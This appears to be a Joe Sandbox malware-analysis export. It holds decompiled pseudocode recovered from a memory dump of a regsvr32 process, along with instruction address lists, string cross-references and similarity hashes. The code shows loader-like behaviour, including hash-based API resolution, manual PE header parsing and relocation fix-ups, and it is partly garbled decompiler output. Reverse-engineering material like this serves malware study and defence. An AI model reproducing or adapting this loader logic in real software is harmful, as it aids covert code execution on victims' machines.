												_t595 =  *(_t835 + 0x54);
												 *((intOrPtr*)(_t835 + 0x58)) = 0;
												goto L37;
											}
											L38:
											_t817 = _t370;
											__eflags = _t817;
											if(_t817 != 0) {
												__eflags = _t595;
												_push(0);
												_t597 =  !=  ? _t595 + 0xc : _t595;
												_push( !=  ? _t595 + 0xc : _t595);
												_t387 = E00491A80(_t785, _t595,  &_v296, 0x2710);
												_t835 = _t835 + 0x10;
												_t595 = 0;
												__eflags = _t387;
												_t817 =  !=  ? 0 : _t817;
											}
											__eflags = _v160;
											if(_v160 == 0) {
												L45:
												__eflags = _v156;
												if(_v156 == 0) {
													L50:
													E00492530(_t595,  &_v296, _t785, _t803, _t817);
													E00489510( &_v216);
													E00489510(_t835 + 0xa50);
													E00489510( &_v248);
													E00491F40( &_v152, _t785, _t817);
													return _t817;
												} else {
													_t785 = E004715C0(0x588ab3ea, 0xea812079);
													__eflags = _t785;
													if(_t785 != 0) {
														_t595 = 0;
														__eflags = 0;
														 *_t785(_t803, _v156, 0xffffffff,  &_v176, 0, 0, 1);
													}
													_t379 = E004715C0(0x588ab3ea, 0x35b39b2b);
													__eflags = _t379;
													if(_t379 == 0) {
														goto L50;
													} else {
														_push(_v176);
														asm("int3");
														return _t379;
													}
												}
											} else {
												_t785 = E004715C0(0x588ab3ea, 0xea812079);
												__eflags = _t785;
												if(_t785 != 0) {
													_t595 = 0;
													__eflags = 0;
													 *_t785(_t803, _v160, 0xffffffff,  &_v176, 0, 0, 1);
												}
												_t383 = E004715C0(0x588ab3ea, 0x35b39b2b);
												__eflags = _t383;
												if(_t383 == 0) {
													goto L45;
												} else {
													_push(_v176);
													asm("int3");
													return _t383;
												}
											}
										} else {
											_t783 = _t833 + 0x4bc;
											 *_t621(0xffffffff, _v276, _t803, _t833 + 0x4bc, 0, 0, 2);
											__eflags = 0;
											if(0 == 0) {
												goto L26;
											} else {
												__eflags = _v196;
												if(_v196 != 0) {
													E0048BE30(_t833 + 0xa78, _t812);
												}
												__eflags = _v168;
												if(_v168 == 0) {
													goto L54;
												} else {
													_t585 = E004715C0(0x588ab3ea, 0xea812079);
													__eflags = _t585;
													if(_t585 == 0) {
														_t586 = E004715C0(0x588ab3ea, 0x35b39b2b);
														__eflags = _t586;
														if(_t586 == 0) {
															goto L54;
														} else {
															_push( *(_t833 + 0x40));
															asm("int3");
															return _t586;
														}
													} else {
														__eflags = 0;
														_push(1);
														_push(0);
														_push(0);
														_push(_t833 + 0x40);
														_push(0xffffffff);
														_push(_v168);
														_push(_t803);
														asm("int3");
														return _t585;
													}
												}
											}
										}
									} else {
										_t783 = _t833 + 0x4bc;
										 *_t620(0xffffffff, _v172, _t803, _t833 + 0x4bc, 0, 0, 2);
										__eflags = 0;
										if(0 == 0) {
											goto L17;
										} else {
											__eflags = _v196;
											if(_v196 != 0) {
												goto L53;
											} else {
											}
											goto L54;
										}
									}
								} else {
									_push(_v160);
									_push(0xffffffff);
									asm("int3");
									return _t329;
								}
							}
						} else {
							__eflags = _v128;
							if(_v128 != 0) {
								L53:
								E0048BE30(_t833 + 0xa78, _t812);
							} else {
							}
							L54:
							E00492530(_t595, _t833 + 0xa10, _t783, _t803, _t812);
							E00489510( &_v224);
							E00489510( &_v240);
							E00489510(_t833 + 0xa40);
							E00491F40( &_v160, _t783, _t812);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = 0;
						_push(0);
						_push(0x8000000);
						_push(4);
						_push(_t833 + 0xa90);
						_push(0);
						_push(0xf001f);
						_push(_t833 + 0xaa4);
						asm("int3");
						return _t317;
					}
				} else {
					E00491F40( &_v72, 0x1d, _t812);
					return 1;
				}
			}

0x00461571
0x00461577
0x00461579
0x0046157f
0x00461581
0x00461592
0x00461597
0x004615a7
0x004615b3
0x004615c8
0x004615e8
0x004615f1
0x004615f6
0x004615ff
0x00461604
0x0046160d
0x00461612
0x00461614
0x00461617
0x0046161a
0x0046161f
0x00461621
0x00461625
0x0046162a
0x0046162a
0x0046162f
0x00461631
0x00461634
0x00461639
0x0046163a
0x00461642
0x00461644
0x00461649
0x00461654
0x00461658
0x00461660
0x00461670
0x00461681
0x00461686
0x00461688
0x004616b2
0x004616c8
0x004616cd
0x004616d2
0x004616e9
0x004616f0
0x004616f7
0x004616fe
0x00461714
0x00461716
0x00461718
0x004626f9
0x004626fd
0x00462701
0x00462706
0x0046270c
0x00462737
0x0046273b
0x0046273d
0x0046273f
0x00000000
0x00462745
0x00462745
0x0046274d
0x00000000
0x00000000
0x00000000
0x0046274d
0x0046171e
0x0046171e
0x00461727
0x0046173e
0x00461743
0x00461750
0x00461755
0x00461757
0x00461764
0x0046177e
0x00461780
0x00461782
0x004617b5
0x004617bc
0x004617d2
0x004617d4
0x004617d6
0x0046186a
0x00461871
0x00461878
0x00461880
0x00461889
0x00461889
0x00461895
0x004618a2
0x004618a4
0x004618a7
0x004618b0
0x004618c3
0x004618cf
0x004618e8
0x004618fb
0x00461912
0x00461917
0x0046191c
0x00461921
0x00461924
0x004627e7
0x004627ec
0x004627f6
0x004627fd
0x00462817
0x0046282d
0x00462843
0x00462859
0x0046286f
0x00462885
0x0046289b
0x004628b1
0x004628c7
0x004628dd
0x004628f3
0x00462909
0x0046291f
0x00462935
0x0046294b
0x00462961
0x00462977
0x0046298d
0x004629a3
0x004629b4
0x004629c0
0x004629ce
0x004629d5
0x004629ed
0x004629fb
0x004629fc
0x00462a01
0x00462a08
0x0046192a
0x00461939
0x0046193e
0x00461948
0x00461956
0x00461960
0x00461962
0x00461967
0x00461976
0x0046197a
0x00461990
0x004619ac
0x004619b1
0x004619bd
0x004619c1
0x004619c4
0x004619cc
0x004619e2
0x004619fe
0x00461a03
0x00461a0f
0x00461a13
0x00461a16
0x00461a1e
0x00461a34
0x00461a50
0x00461a55
0x00461a61
0x00461a65
0x00461a68
0x00461a70
0x00461a86
0x00461aa2
0x00461aa7
0x00461ab3
0x00461ab7
0x00461aba
0x00461ac2
0x00461ad8
0x00461af4
0x00461af9
0x00461b05
0x00461b09
0x00461b0c
0x00461b14
0x00461b2a
0x00461b46
0x00461b4b
0x00461b57
0x00461b5b
0x00461b5e
0x00461b66
0x00461b7c
0x00461b98
0x00461b9d
0x00461ba9
0x00461bad
0x00461bb0
0x00461bb8
0x00461bce
0x00461bea
0x00461bef
0x00461bfb
0x00461bff
0x00461c02
0x00461c0a
0x00461c20
0x00461c3c
0x00461c41
0x00461c4d
0x00461c51
0x00461c54
0x00461c5c
0x00461c72
0x00461c8e
0x00461c93
0x00461c9f
0x00461ca3
0x00461ca6
0x00461cae
0x00461cc4
0x00461ce0
0x00461ce5
0x00461cf1
0x00461cf5
0x00461cf8
0x00461d00
0x00461d16
0x00461d32
0x00461d37
0x00461d43
0x00461d47
0x00461d4a
0x00461d52
0x00461d68
0x00461d84
0x00461d89
0x00461d95
0x00461d99
0x00461d9c
0x00461da4
0x00461dba
0x00461dd6
0x00461ddb
0x00461de7
0x00461deb
0x00461dee
0x00461df6
0x00461e0c
0x00461e28
0x00461e2d
0x00461e39
0x00461e3d
0x00461e40
0x00461e48
0x00461e5e
0x00461e7a
0x00461e7f
0x00461e8b
0x00461e8f
0x00461e92
0x00461e9a
0x00461eb0
0x00461ec1
0x00461ecc
0x00461ed1
0x00461ee2
0x00461ee5
0x00461ef3
0x00461ef8
0x00461efd
0x00461f0f
0x00461f14
0x00461f19
0x00461f2b
0x00461f30
0x00461f35
0x00461f47
0x00461f4c
0x00461f51
0x00461f63
0x00461f68
0x00461f6d
0x00461f7f
0x00461f84
0x00461f89
0x00461f9b
0x00461fa0
0x00461fa5
0x00461fba
0x00461fbf
0x00461fc4
0x00461fd9
0x00461fde
0x00461fe3
0x00461ff8
0x00461ffd
0x00462002
0x00462017
0x0046201c
0x00462021
0x00462036
0x0046203b
0x00462040
0x00462055
0x0046205a
0x0046205f
0x00462074
0x00462079
0x0046207e
0x00462093
0x00462098
0x0046209d
0x004620b2
0x004620b7
0x004620bc
0x004620ce
0x004620d3
0x004620d8
0x004620df
0x004620ea
0x004620ef
0x004620f4
0x004620f8
0x004620f9
0x00462104
0x0046210c
0x00462110
0x00462114
0x00462115
0x00462119
0x0046211d
0x00462121
0x00462125
0x0046212b
0x00462133
0x00462137
0x00462137
0x0046213d
0x00462142
0x00462146
0x0046214e
0x00462157
0x0046215d
0x00462166
0x0046216c
0x00462172
0x00462178
0x00462180
0x00462186
0x0046218c
0x00462197
0x004621ab
0x004621b4
0x004621bd
0x004621c6
0x004621c8
0x004621d1
0x004621d5
0x004621de
0x00000000
0x004621e4
0x004621e4
0x004621f0
0x00462203
0x00462215
0x00462220
0x00462227
0x0046222d
0x00462231
0x00462236
0x0046223e
0x00462242
0x0046224b
0x00462253
0x00462259
0x0046225d
0x00462261
0x0046226b
0x0046226c
0x00462272
0x00462276
0x00462277
0x0046227b
0x00462281
0x00462285
0x00462289
0x0046228f
0x00462295
0x0046229a
0x0046229c
0x004627c5
0x004627cc
0x004627d1
0x004622a2
0x004622a9
0x004622ab
0x00000000
0x004622b1
0x004622bb
0x004622c0
0x004622d1
0x004622e0
0x004622fc
0x0046230a
0x00462311
0x0046231d
0x00462329
0x0046232e
0x0046232e
0x0046232e
0x004622ab
0x00462334
0x0046233a
0x004627ad
0x004627b1
0x004627b5
0x004627bc
0x00000000
0x00000000
0x00000000
0x0046233a
0x00462356
0x00462364
0x00462370
0x00462375
0x00462384
0x00462388
0x0046239e
0x004623ba
0x004623bf
0x004623cb
0x004623cf
0x004623d2
0x004623da
0x004623f0
0x0046240c
0x00462411
0x0046241d
0x00462421
0x00462424
0x0046242c
0x00462442
0x0046245e
0x00462463
0x0046246f
0x00462473
0x00462476
0x0046247e
0x00462494
0x004624a5
0x004624b0
0x004624b7
0x004624c3
0x004624c4
0x004624c8
0x004624c9
0x004624d5
0x004624e3
0x004624e8
0x004624ed
0x004624ff
0x00462504
0x00462509
0x0046251b
0x00462520
0x00462525
0x00462537
0x0046253c
0x00462548
0x0046254d
0x00462559
0x00462565
0x00462566
0x00462571
0x00462575
0x00462576
0x0046257a
0x0046257e
0x00462587
0x0046258b
0x0046258f
0x004625ac
0x004625c0
0x004625c7
0x00000000
0x00462340
0x00462340
0x00462340
0x00462348
0x00462348
0x0046234a
0x0046234e
0x00462352
0x00000000
0x00462352
0x004625cc
0x004625cc
0x004625d0
0x004625d2
0x004625d4
0x004625d9
0x004625db
0x004625de
0x004625ec
0x004625f1
0x004625f4
0x004625f6
0x004625f8
0x004625f8
0x004625fb
0x00462603
0x00462650
0x00462650
0x00462658
0x004626a5
0x004626ac
0x004626b8
0x004626c4
0x004626d0
0x004626dc
0x004626ef
0x0046265a
0x00462669
0x0046266b
0x0046266d
0x0046266f
0x0046266f
0x00462687
0x00462687
0x00462693
0x00462698
0x0046269a
0x00000000
0x0046269c
0x0046269c
0x004626a3
0x004626a4
0x004626a4
0x0046269a
0x00462605
0x00462614
0x00462616
0x00462618
0x0046261a
0x0046261a
0x00462632
0x00462632
0x0046263e
0x00462643
0x00462645
0x00000000
0x00462647
0x00462647
0x0046264e
0x0046264f
0x0046264f
0x00462645
0x004617dc
0x004617de
0x004617f4
0x004617f6
0x004617f8
0x00000000
0x004617fa
0x004617fa
0x00461802
0x0046180b
0x0046180b
0x00461810
0x00461818
0x00000000
0x0046181e
0x00461828
0x0046182d
0x0046182f
0x00461852
0x00461857
0x00461859
0x00000000
0x0046185f
0x0046185f
0x00461863
0x00461864
0x00461864
0x00461831
0x00461831
0x00461837
0x00461839
0x0046183a
0x0046183b
0x0046183c
0x0046183e
0x00461845
0x00461846
0x00461847
0x00461847
0x0046182f
0x00461818
0x004617f8
0x00461784
0x00461786
0x0046179c
0x0046179e
0x004617a0
0x00000000
0x004617a2
0x004617a2
0x004617aa
0x00000000
0x00000000
0x004617b0
0x00000000
0x004617aa
0x004617a0
0x00461759
0x00461759
0x00461760
0x00461762
0x00461763
0x00461763
0x00461757
0x004616d4
0x004616d4
0x004616dc
0x0046274f
0x00462756
0x00000000
0x004616e2
0x0046275b
0x00462762
0x0046276e
0x0046277a
0x00462786
0x00462792
0x00462797
0x004627a5
0x004627a5
0x0046168a
0x0046168a
0x00461693
0x00461694
0x00461699
0x0046169b
0x0046169c
0x0046169d
0x004616a9
0x004616aa
0x004616ab
0x004616ab
0x004615ca
0x004615d1
0x004615e7
0x004615e7

Strings

)8GV, xrefs: 00461956
)8GV, xrefs: 004627FD

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: )8GV$)8GV
API String ID: 0-993736920
Opcode ID: 1088c929e4f0b0c275280590cd41b85a6ed050656a507871b94b151fead3aed8
Instruction ID: bda291ae32876dbded23ba26c2aecef4ffe9f2ad80e91e9177a9e9d57a04027a
Opcode Fuzzy Hash: 1088c929e4f0b0c275280590cd41b85a6ed050656a507871b94b151fead3aed8
Instruction Fuzzy Hash: 1DA27F71518B819AE330EF25C952BEFB3E4AFE2318F044A1EB58A62193FF345944C756

Uniqueness

Uniqueness Score: -1.00%

Function 0046ACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E0046ACD0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v192;
				char _v196;
				char _v200;
				char _v216;
				char _v220;
				char _v232;
				char _v248;
				void* _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				void* _v276;
				char _v280;
				signed int _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int _v304;
				char _v308;
				char _v312;
				char _v316;
				signed int _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _v364;
				char _v368;
				void* _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				void* _v440;
				char _v444;
				void* _v448;
				char _v452;
				char _v460;
				intOrPtr _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				char _v480;
				void* _v484;
				void* _v488;
				intOrPtr _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				intOrPtr _v508;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void* _v548;
				intOrPtr _v552;
				void* _v556;
				char _v560;
				signed short* _v564;
				signed int _v568;
				signed int _v572;
				char _v576;
				intOrPtr _v580;
				signed int _v584;
				void* _v588;
				void* _v592;
				void* _v596;
				char _v604;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v636;
				intOrPtr _v640;
				char _v644;
				void* _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v676;
				signed int _v680;
				intOrPtr _v700;
				void* _v704;
				void* _v708;
				void* _v716;
				intOrPtr _v724;
				intOrPtr _v732;
				signed int _v736;
				signed int _v740;
				intOrPtr _v744;
				void* _v748;
				void* _v756;
				void* _v764;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				void* _v788;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v856;
				void* _v860;
				void* _v868;
				void* _v872;
				void* _v876;
				void* _v880;
				void* _v888;
				void* _v892;
				void* _v908;
				void* _v940;
				void* _v944;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t632;
				void* _t667;
				signed int _t672;
				char _t747;
				signed int _t768;
				signed int _t770;
				signed int _t778;
				char* _t781;
				signed int _t782;
				signed int _t793;
				signed int _t795;
				char* _t798;
				signed int _t799;
				signed int _t810;
				signed int _t812;
				signed int _t813;
				signed int _t815;
				intOrPtr _t865;
				intOrPtr _t900;
				signed int _t911;
				char _t974;
				signed char* _t1005;
				signed int _t1006;
				void* _t1008;
				void* _t1011;
				intOrPtr _t1017;
				signed int _t1021;
				char _t1030;
				char _t1035;
				signed int _t1036;
				char* _t1038;
				signed int _t1040;
				signed int _t1041;
				signed int* _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				void* _t1055;
				void* _t1065;
				char* _t1154;
				signed int _t1326;
				signed short* _t1435;
				void* _t1438;
				char* _t1449;
				char* _t1452;
				signed int _t1455;
				signed int _t1457;
				signed int _t1459;
				signed int _t1460;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1481;
				void* _t1485;
				signed int _t1487;
				char _t1498;
				void* _t1499;
				void* _t1500;
				char _t1503;
				void* _t1514;
				void* _t1518;
				char _t1531;
				signed int _t1537;
				signed int _t1538;
				signed int _t1539;
				char _t1540;
				intOrPtr _t1542;
				signed int _t1543;
				signed int _t1545;
				void* _t1547;
				void* _t1567;
				void* _t1569;
				signed int _t1570;
				void* _t1572;
				void* _t1573;
				void* _t1574;
				void* _t1576;

				_t1572 = (_t1570 & 0xfffffff0) - 0x254;
				_v540 = __edx;
				_v28 = __ecx;
				_t1534 =  *((intOrPtr*)(__ecx + 0xc));
				E004715C0(0x57325ee3, 0xb7186560);
				_push(0);
				E00489350( &_v192);
				_v180 = 0;
				_push(0);
				E00489350( &_v176);
				_push(0);
				E00489350( &_v76);
				_v536 = 0x58d59bc9;
				asm("pxor xmm0, xmm0");
				asm("movq [esp+0x68], xmm0");
				E00489670( &_v80, E00489650( &_v80) + 0x10);
				E00489640( &_v84, E00489650( &_v84) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v544 = 0x3b4caff7;
				asm("movq [esp+0x68], xmm1");
				E00489670( &_v88, E00489650( &_v88) + 0x10);
				E00489640( &_v92, E00489650( &_v92) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v552 = 0xd9ff67e3;
				asm("movq [esp+0x68], xmm1");
				E00489670( &_v96, E00489650( &_v96) + 0x10);
				E00489640( &_v100, E00489650( &_v100) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v560 = 0xbcd9ca71;
				asm("movq [esp+0x68], xmm1");
				E00489670( &_v104, E00489650( &_v104) + 0x10);
				E00489640( &_v108, E00489650( &_v108) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v568 = 0x1be15feb;
				asm("movq [esp+0x68], xmm1");
				E00489670( &_v112, E00489650( &_v112) + 0x10);
				E00489640( &_v116, E00489650( &_v116) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v576 = 0xebe915fa;
				asm("movq [esp+0x68], xmm1");
				E00489670( &_v120, E00489650( &_v120) + 0x10);
				E00489640( &_v124, E00489650( &_v124) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [eax], xmm0");
				E00491270(0x588ab3ea,  &_v128);
				E00489640( &_v128, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1d8], xmm0");
				E00489640( &_v132, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1e0], xmm0");
				E00489640( &_v136, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f0], xmm0");
				E00489640( &_v140, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x1f8], xmm0");
				E00489640( &_v144, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp+0x200], xmm0");
				E00489640( &_v148, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [eax-0x38], xmm0");
				 *((intOrPtr*)( &_v128 - 0x98)) = _t1534;
				E0046D570( &_v280,  &_v136,  &_v128);
				_t1487 = _v140;
				_t1027 = _v136;
				if((_t1487 | _v136) != 0) {
					_push(0x40);
					E00489350( &_v288);
					E00490FA0(_t1534, E00489640( &_v292, 0), __eflags, _t1487, _t1027, 0x40, 0);
					_t1435 = E00489640( &_v312, 0);
					__eflags = ( *_t1435 & 0x0000ffff) - 0x5a4d;
					if(( *_t1435 & 0x0000ffff) == 0x5a4d) {
						asm("cdq");
						_v560 = _t1435[0x1e] + _t1487;
						asm("adc edx, ebx");
						_v564 = _t1435;
						_push(0x108);
						E00489350( &_v388);
						E00490FA0(_t1534, E00489640( &_v392, 0), __eflags, _v568, _v572, 0x108, 0);
						_push( &_v412);
						E00489520( &_v316);
						E00489510( &_v416);
						_t632 = E00489640( &_v320, 0);
						__eflags =  *_t632 - 0x4550;
						if( *_t632 != 0x4550) {
							goto L3;
						} else {
							_t1481 =  *(_t632 + 0x88);
							_v568 = _t1481;
							_v572 =  *((intOrPtr*)(_t632 + 0x8c));
							__eflags = _t1481;
							if(_t1481 == 0) {
								goto L3;
							} else {
								__eflags = _v572;
								if(_v572 == 0) {
									goto L3;
								} else {
									_push(_v572);
									E00489350( &_v396);
									_t1011 = E00489640( &_v400, 0);
									asm("adc ebx, 0x0");
									E00490FA0(_t1534, _t1011, __eflags, _t1487 + _v576, _t1027, _v580, 0);
									_push( &_v420);
									E00489520( &_v324);
									E00489510( &_v424);
									_t1065 = E00489640( &_v328, 0);
									_t1017 =  *((intOrPtr*)(_t1572 + 0x44));
									 *((intOrPtr*)(_t1065 + 0x1c)) =  *((intOrPtr*)(_t1065 + 0x1c)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x24)) =  *((intOrPtr*)(_t1065 + 0x24)) - _t1017;
									 *((intOrPtr*)(_t1065 + 0x20)) =  *((intOrPtr*)(_t1065 + 0x20)) - _t1017;
									_t1485 = E00489640( &_v332,  *((intOrPtr*)(_t1065 + 0x20)) - _t1017);
									__eflags =  *(_t1065 + 0x18);
									if( *(_t1065 + 0x18) > 0) {
										_v560 = _t1534;
										_t1021 = 0;
										__eflags = 0;
										_t1531 = _v576;
										while(1) {
											_t1021 = _t1021 + 1;
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 8)) - _t1531;
											_t554 = _t1021 - 1; // 0x0
											_t1567 = _t1021 + _t1021;
											__eflags = _t1021 + _t554 -  *(_t1065 + 0x18);
											if(_t1021 + _t554 >=  *(_t1065 + 0x18)) {
												break;
											}
											 *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) =  *((intOrPtr*)(_t1485 + _t1021 * 8 - 4)) - _t1531;
											__eflags = _t1567 -  *(_t1065 + 0x18);
											if(_t1567 <  *(_t1065 + 0x18)) {
												continue;
											}
											break;
										}
										_t1534 = _v560;
									}
									_push( &_v308);
									E004893D0( &_v292);
								}
							}
						}
					} else {
						L3:
						_push(0);
						E00489350( &_v284);
					}
					E00489510( &_v304);
					E0048A110( &_v88);
					_v544 = 0x41195991;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E00489670( &_v88, E00489650( &_v88) + 0x10);
					E00489640( &_v92, E00489650( &_v92) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v552 = 0x77be1f6;
					asm("movq [esp+0x68], xmm1");
					E00489670( &_v96, E00489650( &_v96) + 0x10);
					E00489640( &_v100, E00489650( &_v100) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					_v560 = 0xb5cdecc0;
					asm("movq [esp+0x68], xmm1");
					E00489670( &_v104, E00489650( &_v104) + 0x10);
					E00489640( &_v108, E00489650( &_v108) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1573 = _t1572 + 0xfffffff4;
					asm("movups [eax], xmm0");
					asm("movq xmm1, [edx+0xd8]");
					asm("movq [esp], xmm1");
					_v668 =  &_v112;
					E0046E780( &_v312, _t1534, __eflags);
					E00489640( &_v124, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x1e8], xmm0");
					E00489640( &_v128, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x210], xmm0");
					_t1438 = E00489640( &_v132, 0x20);
					_v268 =  *((intOrPtr*)(_t1438 + 8));
					 *((intOrPtr*)(_t1573 + 0x218)) =  *((intOrPtr*)(_t1438 + 0xc));
					_push(0);
					E00489350( &_v320);
					_push(0);
					E00489350( &_v308);
					_push(0);
					_push( *0x499d74);
					E00471BA0(__eflags,  &_v284);
					E00489B10( &_v340);
					E00480B10( &_v284);
					E00489670( &_v328, E00489A90( &_v344, _t1534));
					_t667 = E00489640( &_v348, 0);
					E0046AC20(_t1569, _t667, E00489640( &_v336, 0), _v296);
					_t1574 = _t1573 + 8;
					_t1030 = E00489650( &_v340);
					_t95 = _t1030 + 2; // 0x2
					_v180 = E0046D860( &_v300, 0x20000000, __eflags, _t95);
					_v640 = 0x20000000;
					_t672 = E0046DB60( &_v304, 0x80000000, __eflags, 0x82);
					_v192 = _t672;
					 *(_t1574 + 0x220) = 0x80000000;
					__eflags = _t672 |  *(_t1574 + 0x220);
					if((_t672 |  *(_t1574 + 0x220)) == 0) {
						L6:
						E00489510( &_v288);
						E00489510( &_v304);
						E00489510( &_v320);
						E00489510( &_v120);
						E0046E2F0(_t1030, _t1574 + 0x1bc, _t1569);
						E00489510(_t1574 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						__eflags = _v124 | _v584;
						if((_v124 | _v584) != 0) {
							E00470B70( &_v560, 0, 0x80);
							_t1576 = _t1574 + 0xc;
							_v464 = _a4;
							_push(0);
							_push(0);
							E00492060(_t1030,  &_v400, 0, _t1534);
							_v348 =  *((intOrPtr*)(_t1576 + 0x48));
							_t1449 =  &_v408;
							 *((intOrPtr*)(_t1449 + 0x38)) = _a8;
							_push(_t1449);
							E0046E090( &_v384, _t1534,  &_v352);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xb0], xmm1");
							_v508 = E00489650(_a8);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [esp+0xc0], xmm1");
							_v492 = E00489650(_v620);
							asm("cdq");
							asm("movd xmm1, eax");
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							asm("movq [edi-0xb8], xmm1");
							E00490FA0(_t1534,  &_v460, __eflags, _v272, _v156, 7,  &_v292);
							_t1154 =  &_v156;
							 *((intOrPtr*)(_t1154 - 0x148)) = _v288;
							 *((intOrPtr*)(_t1154 - 0x144)) =  *((intOrPtr*)(_t1154 - 0x10));
							E0048A110(_t1154);
							_v612 = 0x9cac62c7;
							asm("pxor xmm0, xmm0");
							asm("movq [esp+0x68], xmm0");
							E00489670( &_v156, E00489650( &_v156) + 0x10);
							E00489640( &_v160, E00489650( &_v160) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v620 = 0xa8f2638d;
							asm("movq [esp+0x68], xmm1");
							E00489670( &_v164, E00489650( &_v164) + 0x10);
							E00489640( &_v168, E00489650( &_v168) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v628 = 0xd8cc7390;
							asm("movq [esp+0x68], xmm1");
							E00489670( &_v172, E00489650( &_v172) + 0x10);
							E00489640( &_v176, E00489650( &_v176) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v636 = 0x6a68465a;
							asm("movq [esp+0x68], xmm1");
							E00489670( &_v180, E00489650( &_v180) + 0x10);
							E00489640(_t1576 + 0x22c, E00489650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v644 = 0x58d59bc9;
							asm("movq [esp+0x68], xmm1");
							E00489670(_t1576 + 0x22c, E00489650(_t1576 + 0x228) + 0x10);
							E00489640( &_v192, E00489650( &_v192) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							 *((intOrPtr*)(_t1576 + 0x60)) = 0xe9fbf3a8;
							asm("movq [esp+0x68], xmm1");
							E00489670( &_v196, E00489650( &_v196) + 0x10);
							E00489640( &_v200, E00489650( &_v200) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v660 = 0x649746ec;
